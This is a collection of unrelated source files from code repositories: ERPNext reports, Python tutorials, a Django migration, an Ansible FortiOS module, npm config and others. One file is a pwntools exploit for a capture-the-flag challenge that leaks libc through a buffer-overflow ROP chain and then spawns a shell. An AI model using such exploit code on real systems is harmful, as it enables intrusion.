] | permissive | azhkhn/pos_bahrain | 6e139bf02489c298ad8ac963b52ef676515e84f5 | eae06abb8eb4a9c4465b02178dd981a8ea430511 | refs/heads/master | 2020-09-17T07:00:51.068742 | 2019-11-16T09:28:43 | 2019-11-16T09:28:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,437 | py | # Copyright (c) 2013, 9t9it and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
from functools import partial
from toolz import concatv, compose, valmap, merge
from pos_bahrain.utils import key_by, mapf, filterf
def execute(filters=None):
from erpnext.stock.report.stock_balance.stock_balance import execute
columns, data = execute(filters)
prices = {
"buying": frappe.db.get_single_value("Buying Settings", "buying_price_list"),
"selling": frappe.db.get_single_value("Selling Settings", "selling_price_list"),
}
return _get_columns(columns, prices), _get_data(data, prices, filters)
def _get_columns(columns, prices):
return list(
concatv(
columns[:2],
[
{
"fieldname": "supplier",
"fieldtype": "Link",
"width": 100,
"label": "Supplier",
"options": "Supplier",
}
],
columns[2:7],
[
{
"fieldname": "buying_price",
"fieldtype": "Currency",
"width": 100,
"label": prices.get("buying"),
},
{
"fieldname": "selling_price",
"fieldtype": "Currency",
"width": 100,
"label": prices.get("selling"),
},
],
columns[7:],
)
)
def _get_data(data, prices, filters):
get_query_by_item_code = compose(
partial(valmap, lambda x: x.get("value")),
partial(key_by, "item_code"),
lambda x: frappe.db.sql(
x,
values=merge({"item_codes": mapf(lambda x: x[0], data)}, prices),
as_dict=1,
),
)
price_query = """
SELECT
ip.item_code AS item_code,
ip.price_list_rate AS value
FROM `tabItem Price` AS ip
LEFT JOIN `tabItem` AS i ON i.name = ip.item_code
WHERE
ip.price_list = %({price})s AND
ip.item_code IN %(item_codes)s AND
IFNULL(ip.uom, '') IN ('', i.stock_uom)
"""
suppliers_by_item_code = get_query_by_item_code(
"""
SELECT
parent AS item_code,
default_supplier AS value
FROM `tabItem Default`
WHERE parent in %(item_codes)s
"""
)
buying_prices_by_item_code = get_query_by_item_code(
price_query.format(price="buying")
)
selling_prices_by_item_code = get_query_by_item_code(
price_query.format(price="selling")
)
def add_fields(row):
item_code = row[0]
return list(
concatv(
row[:2],
[suppliers_by_item_code.get(item_code)],
row[2:7],
[
buying_prices_by_item_code.get(item_code),
selling_prices_by_item_code.get(item_code),
],
row[7:],
)
)
def filter_by_supplier(row):
if not filters.supplier:
return True
return filters.supplier == row[2]
make_data = compose(partial(filterf, filter_by_supplier), partial(map, add_fields))
return make_data(data)
| [
"sun@libermatic.com"
] | sun@libermatic.com |
40b52f45132e2e3030aae2cd04ce2496b8e8a52c | 76995eda52f3d8b7310ff53fc9b5f8b9ea00287a | /hello world.py | 43b4393dd19e59377c38451746abce7b31c05adc | [] | no_license | tonybelair922/demo_YT | 7bcf3573bb4ae2bdf34d615a5aecd40a48211faf | e748bd33878699f886928449b7926baa11356383 | refs/heads/main | 2023-03-13T09:59:14.937299 | 2021-03-08T07:44:33 | 2021-03-08T07:44:33 | 326,244,329 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,645 | py | """
msg= " Hello world"
for x in range(16):
print(msg)
"""
def my_function():
for x in range(6):
print("Hello from a function")
my_function()
{
"version" : "3.0",
"user" : "internal-api-beta-user",
"dateGenerated" : "2016-12-23T15:24:07Z",
"status" : "OK",
"data" : [ {
"parameter" : "t_2m:C",
"coordinates" : [ {
"lat" : 50,
"lon" : 10,
"dates" : [ {
"date" : "2016-12-20T00:00:00Z",
"value" : -1.18699,
}, {
"date" : "2016-12-21T00:00:00Z",
"value" : -2.58338,
}, {
"date" : "2016-12-22T00:00:00Z",
"value" : 0.0499817,
} ]
}, {
"lat" : 40,
"lon" : 20,
"dates" : [ {
"date" : "2016-12-20T00:00:00Z",
"value" : -0.186987,
}, {
"date" : "2016-12-21T00:00:00Z",
"value" : -0.0833496,
}, {
"date" : "2016-12-22T00:00:00Z",
"value" : 1.04998,
} ]
} ]
}, {
"parameter" : "relative_humidity_2m:p",
"coordinates" : [ {
"lat" : 50,
"lon" : 10,
"dates" : [ {
"date" : "2016-12-20T00:00:00Z",
"value" : 98.0471,
}, {
"date" : "2016-12-21T00:00:00Z",
"value" : 94.6451,
}, {
"date" : "2016-12-22T00:00:00Z",
"value" : 96.7655,
} ]
}, {
"lat" : 40,
"lon" : 20,
"dates" : [ {
"date" : "2016-12-20T00:00:00Z",
"value" : 77.4957,
}, {
"date" : "2016-12-21T00:00:00Z",
"value" : 78.3308,
}, {
"date" : "2016-12-22T00:00:00Z",
"value" : 64.9726,
} ]
} ]
} ]
} | [
"you@example.com"
] | you@example.com |
cd48574c9c58a59d8434aa039fe557ccc7bf88f9 | 0fd5793e78e39adbfe9dcd733ef5e42390b8cc9a | /python3/16_Web_Services/e_GraphQL/creating/a_graphene/e_input_object_types.py | 409fed8fe1a59002922ab86d2f343886941285b2 | [] | no_license | udhayprakash/PythonMaterial | 3ea282ceb4492d94d401e3bc8bad9bf6e9cfa156 | e72f44e147141ebc9bf9ec126b70a5fcdbfbd076 | refs/heads/develop | 2023-07-08T21:07:33.154577 | 2023-07-03T10:53:25 | 2023-07-03T10:53:25 | 73,196,374 | 8 | 5 | null | 2023-05-26T09:59:17 | 2016-11-08T14:55:51 | Jupyter Notebook | UTF-8 | Python | false | false | 677 | py | import graphene
class Person(graphene.ObjectType):
name = graphene.String()
age = graphene.Int()
class PersonInput(graphene.InputObjectType):
name = graphene.String()
age = graphene.Int()
class Mutation(graphene.ObjectType):
create_person = graphene.Field(Person, input=PersonInput())
def resolve_create_person(self, info, input):
return Person(name=input.name, age=input.age)
schema = graphene.Schema(mutation=Mutation)
mutation = """
mutation {
createPerson(input: { name: "John Doe", age: 30 }) {
name
age
}
}
"""
result = schema.execute(mutation)
print(result.data["createPerson"])
| [
"uday3prakash@gmail.com"
] | uday3prakash@gmail.com |
27a81b2c84baeca740e1eb28aeb702ae4cfe4214 | 30c8dd5f094fa486b006d5c558aba25e64486398 | /serv4.py | ae07520d05c98ff50c16029501b715aca5877c55 | [] | no_license | badillosoft/iot-b | 9942b2501ebb0457b2bd5a3c69855706bce6d486 | 4f608a2b808e4fb9476a73e513664082f34d58ce | refs/heads/master | 2020-03-31T03:59:13.947614 | 2018-10-07T00:05:28 | 2018-10-07T00:05:28 | 151,886,825 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 313 | py | # -*- coding: utf-8 -*-
from flask import Flask
import os
app = Flask(__name__)
@app.route("/saludar")
def saludar():
return "Hola"
@app.route("/ultra")
def ultra():
stream = os.popen("python ultrasonico_html.py")
return stream.read()
app.run(host="192.168.100.48")
#http://192.168.100.48:5000/saludar
| [
"badillo.soft@hotmail.com"
] | badillo.soft@hotmail.com |
5584ee69c15cd5aacd051f6f1e7bfd3f031a0c37 | 8e23cbf08a8c5d966f642ef89a25309392acdb36 | /python教学/装饰器.py | e6b6e1325f7f6353583cdae58f87ff140bebf4a3 | [] | no_license | gyhd/python_study | ba94eca3aa391c56cdb34a48bcb6cd32581703e0 | 3b8c99179903d9c81b70d65c8df3023449394f57 | refs/heads/master | 2022-11-27T18:00:20.259082 | 2020-07-11T09:49:10 | 2020-07-11T09:49:10 | 248,500,662 | 3 | 1 | null | 2022-11-22T05:08:17 | 2020-03-19T12:44:35 | Jupyter Notebook | UTF-8 | Python | false | false | 1,499 | py | # -*- coding: utf-8 -*-
"""
Created on Mon Apr 29 15:48:22 2019
@author: Maibenben
"""
"""
def use_logging(func):
def wrapper(*args,**kwargs):
kwarg_values=[i for i in kwarg_values()]
for arg in list(args) + kwarg_values:
if not isinstance(arg,int):
return print('wrong input')
return func(*args,**kwargs)
return wrapper
@use_logging
def foo(a,b):
return (a+b)
foo(5,1)
"""
import hello
print('I am python')
class Foo(object):
def __init__(self,func):
self.func=func
def __call__(self):
print("%s is running"%self.func)
self.func()
print("%s is end"%self.func)
@Foo
def bar():
print('bar')
bar()
class people:
def __init__(self,n,a):
self.__name=n
self.__age=a
@property
def age(self):
return print(self.__age)
@age.setter
def age(self,age):
self.__age=age
def speak(self):
print("%s says: I am %d years old"%(self.__name,self.__age))
#调用实例
p=people('fiona',20)
p.age=50
p.speak()
class A(object):
bar=1
def func1(self):
print('foo')
@classmethod
def func2(cls):
print('func2')
print(cls.bar)
cls().func1() #调用 foo 方法
A.func2() #不需要实例化
class C(object):
@staticmethod
def f():
print('fiona')
C.f() #静态方法无需实例化
a=C()
a.f() #也可以实例化后调用
| [
"2578278753@qq.com"
] | 2578278753@qq.com |
855b7ea3ed9f6b80d4674bf06c86a849cf414ce6 | 45b4687f1a9bc885666c06ea2c6b105e5058a7ae | /pyavrutils/examples/usage_ard.py | 15cb144b0f5e90d4f551e9711bed305552c40885 | [
"BSD-2-Clause"
] | permissive | ponty/pyavrutils | 5e14e0d2275235d87ed5668b632b16d0ea05711d | 460ae240b1360241e6867684300bd5f9a23b057b | refs/heads/master | 2020-12-24T16:06:55.990646 | 2020-05-02T09:00:26 | 2020-05-02T09:00:26 | 2,108,946 | 10 | 2 | null | null | null | null | UTF-8 | Python | false | false | 569 | py | from entrypoint2 import entrypoint
code = '''
from pyavrutils import Arduino
cc = Arduino(board='mini')
cc.build('void setup(){};void loop(){}')
cc.output
cc.size()
cc.size().program_bytes
cc.board='pro'
cc.build('void setup(){};void loop(){}')
cc.output
cc.size().program_bytes
cc.warnings
'''
@entrypoint
def main():
for line in code.strip().splitlines():
print('>>> %s' % line)
try:
s = eval(line)
if s:
print(s)
except SyntaxError:
exec(line)
| [
"ponty@home"
] | ponty@home |
1024e3e86e782595371ff6d7a72d2c358bef7c38 | 8096e140f0fd38b9492e0fcf307990b1a5bfc3dd | /Python/madlibs/version1.py | 030da60671377a43b1498010dbff0898eb122bb7 | [] | no_license | perennialAutodidact/PDXCodeGuild_Projects | 0cacd44499c0bdc0c157555fe5466df6d8eb09b6 | 28a8258eba41e1fe6c135f54b230436ea7d28678 | refs/heads/master | 2022-11-15T22:26:45.775550 | 2020-07-07T17:13:01 | 2020-07-07T17:13:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 794 | py | print("\nPlease enter: \n")
adjective_1 = input("Adjective: ")
place = input("Place: ")
plural_noun = input("Plural noun: ")
adjective_2 = input("Adjective: ")
adjective_3 = input("Adjective: ")
verb_1 = input("\"ing\" verb: ")
verb_2 = input("\"ing\" verb: ")
adjective_4 = input("Adjective: ")
adjective_5 = input("Adjective: ")
noun_1 = input("Noun: ")
f"If you go to some {adjective_1} place like {place} , you must know how to deal with wild animals such as bears, wolves and{plural_noun} . The most important of these is the bear. There are three kinds of bear, the grizzly bear, the {adjective_2} bear and the {adjective_3} bear. Bears spend most of their time {verb_1} or {verb_2} . They look very {adjective_4} , but if you make them {adjective_5} , they might bite your {noun_1} ."
| [
"keegood8@gmail.com"
] | keegood8@gmail.com |
980e1ccc875d26d9d2310924a4cf756d9eb52c42 | 077a17b286bdd6c427c325f196eb6e16b30c257e | /07-RemoteLibcId/247ctf_non-exectuable-stack/exploit.py | 8ae0a1385c0478c8df203b33d8d459ef768279ff | [] | no_license | KurSh/remenissions_test | 626daf6e923459b44b82521aa4cb944aad0dbced | 9dec8085b62a446f7562adfeccf70f8bfcdbb738 | refs/heads/master | 2023-07-08T20:25:04.823318 | 2020-10-05T06:45:16 | 2020-10-05T06:45:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 889 | py | #!/usr/bin/env python3
from pwn import *
import os
import sf
import sys
import signal
target = remote("042f9172aa4814e7.247ctf.com", 50384)
bof_payload = sf.BufferOverflow(arch=32)
bof_payload.set_input_start(0x2c)
rop_chain = [134513552, 134513981, 134520856]
bof_payload.add_rop_chain(rop_chain)
payload = bof_payload.generate_payload()
target.sendline(payload)
target.recvline()
target.recvline()
leak = target.recv(4)
puts_address = u32(leak)
libc_base = puts_address - (422752)
print("libc base is: %s" % hex(libc_base))
bof_payload = sf.BufferOverflow(arch = 32)
bof_payload.add_base("libc", libc_base)
bof_payload.set_input_start(0x2c)
rop_chain = [[249104, 'libc'], b'0000', [1554639, 'libc']]
bof_payload.add_rop_chain(rop_chain)
payload = bof_payload.generate_payload()
target.sendline(payload)
# Exploit Verification starts here 15935728
time.sleep(.5)
target.interactive() | [
"ryancmeinke@gmail.com"
] | ryancmeinke@gmail.com |
5a9e2337774edfa2d38ae948f760275231a69469 | 41311e8bbed80e1f819157d24d7943c05ba6b2e6 | /quiz/p1-1.py | 6904090c9c4d88daefea5beda24e62a30c34efb8 | [] | no_license | tanglan2009/MITx6.00.2x_Introductin_Computational_Thinking_and_Data_Science | c0bb39cb0964014661823e1301f05af7837ff3c5 | 334726fca7f87eae55f5f45c3cdc4dbac02cfac4 | refs/heads/master | 2021-01-10T02:49:34.663406 | 2016-03-06T19:49:44 | 2016-03-06T19:49:44 | 53,272,724 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 136 | py | import random
def f(x):
# x is an integer
return int(x + random.choice([0.25, 0.5, 0.75]))
print f(1)
print f(2)
print f(3) | [
"tanglan2009@gmail.com"
] | tanglan2009@gmail.com |
c020c2f69a1976edb765483dd834de041a8b2bb9 | 3ae29d8aa791c03e9a09eb07a83a1eaf49772fb6 | /restaurant/migrations/0019_auto__del_rating.py | a4af116d7a5caeba246a44a2461a5fd07f2f124c | [] | no_license | rif/click2eat | 26ca011288b1d4f9d69c0e8ecd36fcd622eb5d0c | 1a6894a46e8bf49edfb9c16e50d925e6354ddc6a | refs/heads/master | 2020-07-11T22:47:15.756006 | 2012-05-15T16:15:22 | 2012-05-15T16:15:22 | 204,658,025 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,928 | py | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Deleting model 'Rating'
db.delete_table('restaurant_rating')
def backwards(self, orm):
# Adding model 'Rating'
db.create_table('restaurant_rating', (
('delivery_time', self.gf('django.db.models.fields.SmallIntegerField')()),
('feedback', self.gf('django.db.models.fields.TextField')(null=True, blank=True)),
('restaurant', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['restaurant.Unit'])),
('user', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'])),
('quality', self.gf('django.db.models.fields.SmallIntegerField')()),
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
))
db.send_create_signal('restaurant', ['Rating'])
models = {
'restaurant.communication': {
'Meta': {'object_name': 'Communication'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'restaurant.currency': {
'Meta': {'object_name': 'Currency'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '20'})
},
'restaurant.deliverytype': {
'Meta': {'object_name': 'DeliveryType'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'price': ('django.db.models.fields.FloatField', [], {})
},
'restaurant.employee': {
'Meta': {'object_name': 'Employee'},
'address': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'end_date': ('django.db.models.fields.DateField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'phone': ('django.db.models.fields.CharField', [], {'max_length': '15'}),
'start_date': ('django.db.models.fields.DateField', [], {})
},
'restaurant.interval': {
'Meta': {'object_name': 'Interval'},
'end_hour': ('django.db.models.fields.CharField', [], {'max_length': '5'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'schedule': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['restaurant.Schedule']"}),
'start_hour': ('django.db.models.fields.CharField', [], {'max_length': '5'}),
'weekdays': ('django.db.models.fields.CommaSeparatedIntegerField', [], {'max_length': '13'})
},
'restaurant.partnerpackage': {
'Meta': {'object_name': 'PartnerPackage'},
'details': ('django.db.models.fields.TextField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'db_index': 'True'})
},
'restaurant.paymentmethod': {
'Meta': {'object_name': 'PaymentMethod'},
'details': ('django.db.models.fields.TextField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'restaurant.schedule': {
'Meta': {'object_name': 'Schedule'},
'description': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'unit': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['restaurant.Unit']", 'unique': 'True'})
},
'restaurant.unit': {
'Meta': {'object_name': 'Unit'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'address': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'admin_users': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'communication': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['restaurant.Communication']", 'symmetrical': 'False'}),
'contact_person': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'currency': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'units_using_this'", 'to': "orm['restaurant.Currency']"}),
'delivery_range': ('django.db.models.fields.FloatField', [], {}),
'delivery_time': ('django.db.models.fields.IntegerField', [], {}),
'delivery_time_user': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'delivery_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['restaurant.DeliveryType']"}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'employee': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['restaurant.Employee']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'info': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'latitude': ('django.db.models.fields.FloatField', [], {}),
'logo_path': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'longitude': ('django.db.models.fields.FloatField', [], {}),
'minimum_ord_val': ('django.db.models.fields.IntegerField', [], {}),
'mobile': ('django.db.models.fields.CharField', [], {'max_length': '15'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'overall_discount': ('django.db.models.fields.FloatField', [], {}),
'package': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['restaurant.PartnerPackage']"}),
'payment_method': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['restaurant.PaymentMethod']", 'symmetrical': 'False'}),
'phone': ('django.db.models.fields.CharField', [], {'max_length': '15'})
}
}
complete_apps = ['restaurant']
| [
"radu@fericean.ro"
] | radu@fericean.ro |
f392ac0672bb07b6422d2d0b1428717eff6cc3b4 | b22b0760b29d24cff24eda9d1c114094fd1a588f | /Python/Easy/1002. Find Common Characters.py | 31ed0092f8a82223904bdc350b72986f3fbb5b1f | [] | no_license | MridulGangwar/Leetcode-Solutions | bbbaa06058a7b3e7621fc54050e344c06a256080 | d41b1bbd762030733fa271316f19724d43072cd7 | refs/heads/master | 2022-03-07T12:20:33.485573 | 2022-02-21T07:22:38 | 2022-02-21T07:22:38 | 231,700,258 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 906 | py | class Solution(object):
def commonChars(self, A):
"""
:type A: List[str]
:rtype: List[str]
"""
init_d ={}
for i in A[0]:
if i not in init_d:
init_d[i]=1
else: init_d[i]+=1
for i in range(1,len(A)):
temp={}
for char in A[i]:
if char not in temp and char in init_d:
temp[char]=1
elif char in temp and char in init_d:
temp[char]+=1
for i in init_d.keys():
if i not in temp:
del init_d[i]
else:
init_d[i] = min(init_d[i],temp[i])
result=[]
for key in init_d.keys():
for i in range(init_d[key]):
result.append(key)
return result | [
"singhmridul1@gmail.com"
] | singhmridul1@gmail.com |
8870f715f7c1f62386ba321b2c3fff4410c3772b | aac418419c2ef4d10c5c4ceb607d3d8329a5f395 | /Accepted/Codeshef/CATSDOGS - Cats_and_Dogs.py | b212a7af8376b88d41f5fa6d86ecea05063d1eb3 | [] | no_license | sudhirshahu51/projects | bb13395227355ff84933b6d3a0f158ee42bcdceb | b2d8331d14d2163b20535368a60c81f6c8bc2c8f | refs/heads/master | 2021-01-01T17:09:18.654060 | 2017-04-24T10:46:15 | 2017-04-24T10:46:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 529 | py | # Code Chef Cats and Dogs problem
t = int(input()) # No. of test cases
while t:
cats, dogs, legs = map(int, input().split())
high = (cats + dogs) * 4 # when all the cats and dogs legs are touching ground
if (cats - (2 * dogs)) <= 0:
low = (dogs * 4) # only dogs legs are touching ground
else:
low = (cats - dogs) * 4 # cats no. are greater than twice of dogs
if legs % 4 == 0 and low <= legs <= high:
print('yes')
else:
print('no')
t -= 1
| [
"deveshaggrawal19@gmail.com"
] | deveshaggrawal19@gmail.com |
2af71e101ceac700047b14f879a4f1bfe9cdd8ee | 42685099f1e25e5c1db51b98546e0be495d2789f | /v6.0.2/system/fortios_system_ipip_tunnel.py | 31f4aa4a9c00a6e26f63b162ddc13d13344ebe69 | [
"Apache-2.0"
] | permissive | sxhdroid/ansible_fgt_modules | 02aaf9af33063d8178e7e898666ac9cdef150a00 | 58d02d80a8d0ff145bee226b345ad9738af523f6 | refs/heads/master | 2020-04-18T01:34:45.990750 | 2019-01-22T10:47:36 | 2019-01-22T10:47:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,097 | py | #!/usr/bin/python
from __future__ import (absolute_import, division, print_function)
# Copyright 2018 Fortinet, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# the lib use python logging can get it if the following is set in your
# Ansible config.
__metaclass__ = type
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'metadata_version': '1.1'}
DOCUMENTATION = '''
---
module: fortios_system_ipip_tunnel
short_description: Configure IP in IP Tunneling in Fortinet's FortiOS and FortiGate.
description:
- This module is able to configure a FortiGate or FortiOS by
allowing the user to configure system feature and ipip_tunnel category.
Examples includes all options and need to be adjusted to datasources before usage.
Tested with FOS v6.0.2
version_added: "2.8"
author:
- Miguel Angel Munoz (@mamunozgonzalez)
- Nicolas Thomas (@thomnico)
notes:
- Requires fortiosapi library developed by Fortinet
- Run as a local_action in your playbook
requirements:
- fortiosapi>=0.9.8
options:
host:
description:
- FortiOS or FortiGate ip adress.
required: true
username:
description:
- FortiOS or FortiGate username.
required: true
password:
description:
- FortiOS or FortiGate password.
default: ""
vdom:
description:
- Virtual domain, among those defined previously. A vdom is a
virtual instance of the FortiGate that can be configured and
used as a different unit.
default: root
https:
description:
- Indicates if the requests towards FortiGate must use HTTPS
protocol
type: bool
default: false
system_ipip_tunnel:
description:
- Configure IP in IP Tunneling.
default: null
suboptions:
state:
description:
- Indicates whether to create or remove the object
choices:
- present
- absent
interface:
description:
- Interface name that is associated with the incoming traffic from available options. Source system.interface.name.
local-gw:
description:
- IPv4 address for the local gateway.
name:
description:
- IPIP Tunnel name.
required: true
remote-gw:
description:
- IPv4 address for the remote gateway.
'''
EXAMPLES = '''
- hosts: localhost
vars:
host: "192.168.122.40"
username: "admin"
password: ""
vdom: "root"
tasks:
- name: Configure IP in IP Tunneling.
fortios_system_ipip_tunnel:
host: "{{ host }}"
username: "{{ username }}"
password: "{{ password }}"
vdom: "{{ vdom }}"
system_ipip_tunnel:
state: "present"
interface: "<your_own_value> (source system.interface.name)"
local-gw: "<your_own_value>"
name: "default_name_5"
remote-gw: "<your_own_value>"
'''
RETURN = '''
build:
description: Build number of the fortigate image
returned: always
type: string
sample: '1547'
http_method:
description: Last method used to provision the content into FortiGate
returned: always
type: string
sample: 'PUT'
http_status:
description: Last result given by FortiGate on last operation applied
returned: always
type: string
sample: "200"
mkey:
description: Master key (id) used in the last call to FortiGate
returned: success
type: string
sample: "key1"
name:
description: Name of the table used to fulfill the request
returned: always
type: string
sample: "urlfilter"
path:
description: Path of the table used to fulfill the request
returned: always
type: string
sample: "webfilter"
revision:
description: Internal revision number
returned: always
type: string
sample: "17.0.2.10658"
serial:
description: Serial number of the unit
returned: always
type: string
sample: "FGVMEVYYQT3AB5352"
status:
description: Indication of the operation's result
returned: always
type: string
sample: "success"
vdom:
description: Virtual domain used
returned: always
type: string
sample: "root"
version:
description: Version of the FortiGate
returned: always
type: string
sample: "v5.6.3"
'''
from ansible.module_utils.basic import AnsibleModule
fos = None
def login(data):
host = data['host']
username = data['username']
password = data['password']
fos.debug('on')
if 'https' in data and not data['https']:
fos.https('off')
else:
fos.https('on')
fos.login(host, username, password)
def filter_system_ipip_tunnel_data(json):
option_list = ['interface', 'local-gw', 'name',
'remote-gw']
dictionary = {}
for attribute in option_list:
if attribute in json and json[attribute] is not None:
dictionary[attribute] = json[attribute]
return dictionary
def system_ipip_tunnel(data, fos):
vdom = data['vdom']
system_ipip_tunnel_data = data['system_ipip_tunnel']
filtered_data = filter_system_ipip_tunnel_data(system_ipip_tunnel_data)
if system_ipip_tunnel_data['state'] == "present":
return fos.set('system',
'ipip-tunnel',
data=filtered_data,
vdom=vdom)
elif system_ipip_tunnel_data['state'] == "absent":
return fos.delete('system',
'ipip-tunnel',
mkey=filtered_data['name'],
vdom=vdom)
def fortios_system(data, fos):
login(data)
methodlist = ['system_ipip_tunnel']
for method in methodlist:
if data[method]:
resp = eval(method)(data, fos)
break
fos.logout()
return not resp['status'] == "success", resp['status'] == "success", resp
def main():
fields = {
"host": {"required": True, "type": "str"},
"username": {"required": True, "type": "str"},
"password": {"required": False, "type": "str", "no_log": True},
"vdom": {"required": False, "type": "str", "default": "root"},
"https": {"required": False, "type": "bool", "default": "False"},
"system_ipip_tunnel": {
"required": False, "type": "dict",
"options": {
"state": {"required": True, "type": "str",
"choices": ["present", "absent"]},
"interface": {"required": False, "type": "str"},
"local-gw": {"required": False, "type": "str"},
"name": {"required": True, "type": "str"},
"remote-gw": {"required": False, "type": "str"}
}
}
}
module = AnsibleModule(argument_spec=fields,
supports_check_mode=False)
try:
from fortiosapi import FortiOSAPI
except ImportError:
module.fail_json(msg="fortiosapi module is required")
global fos
fos = FortiOSAPI()
is_error, has_changed, result = fortios_system(module.params, fos)
if not is_error:
module.exit_json(changed=has_changed, meta=result)
else:
module.fail_json(msg="Error in repo", meta=result)
if __name__ == '__main__':
main()
| [
"magonzalez@fortinet.com"
] | magonzalez@fortinet.com |
3f3bf6e43eebbc4bc557d29096041bd38f644295 | 3922557a09e8573a10328513d25c551365916b36 | /node_modules/socket.io/node_modules/socket.io-client/node_modules/ws/build/config.gypi | 55677338992d2b1cea185bf970f72d860d53170d | [
"MIT"
] | permissive | justintime170/nodeserv-test | f6b287f372f5859a78051a7f6e77ab441047bb7f | 96e435fa9682303cc9cf07fbafdb55f37d68b08d | refs/heads/master | 2016-09-05T23:46:03.891240 | 2014-08-21T07:30:13 | 2014-08-21T07:30:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,685 | gypi | # Do not edit. File was generated by node-gyp's "configure" step
{
"target_defaults": {
"cflags": [],
"default_configuration": "Release",
"defines": [],
"include_dirs": [],
"libraries": []
},
"variables": {
"clang": 0,
"gcc_version": 44,
"host_arch": "x64",
"node_install_npm": "true",
"node_install_waf": "true",
"node_prefix": "/usr",
"node_shared_openssl": "false",
"node_shared_v8": "false",
"node_shared_zlib": "false",
"node_tag": "",
"node_unsafe_optimizations": 0,
"node_use_dtrace": "false",
"node_use_etw": "false",
"node_use_openssl": "true",
"target_arch": "x64",
"v8_no_strict_aliasing": 1,
"v8_use_snapshot": "true",
"nodedir": "/root/.node-gyp/0.8.20",
"copy_dev_lib": "true",
"save_dev": "",
"browser": "",
"viewer": "man",
"rollback": "true",
"usage": "",
"globalignorefile": "/usr/etc/npmignore",
"init_author_url": "",
"shell": "/bin/bash",
"parseable": "",
"userignorefile": "/root/.npmignore",
"cache_max": "null",
"init_author_email": "",
"sign_git_tag": "",
"ignore": "",
"long": "",
"registry": "https://registry.npmjs.org/",
"fetch_retries": "2",
"npat": "",
"message": "%s",
"versions": "",
"globalconfig": "/usr/etc/npmrc",
"always_auth": "",
"cache_lock_retries": "10",
"fetch_retry_mintimeout": "10000",
"proprietary_attribs": "true",
"coverage": "",
"json": "",
"pre": "",
"description": "true",
"engine_strict": "",
"https_proxy": "",
"init_module": "/root/.npm-init.js",
"userconfig": "/root/.npmrc",
"npaturl": "http://npat.npmjs.org/",
"node_version": "v0.8.20",
"user": "",
"editor": "vi",
"save": "",
"tag": "latest",
"global": "",
"optional": "true",
"username": "",
"bin_links": "true",
"force": "",
"searchopts": "",
"depth": "null",
"rebuild_bundle": "true",
"searchsort": "name",
"unicode": "true",
"yes": "",
"fetch_retry_maxtimeout": "60000",
"strict_ssl": "true",
"dev": "",
"fetch_retry_factor": "10",
"group": "",
"cache_lock_stale": "60000",
"version": "",
"cache_min": "10",
"cache": "/root/.npm",
"searchexclude": "",
"color": "true",
"save_optional": "",
"user_agent": "node/v0.8.20 linux x64",
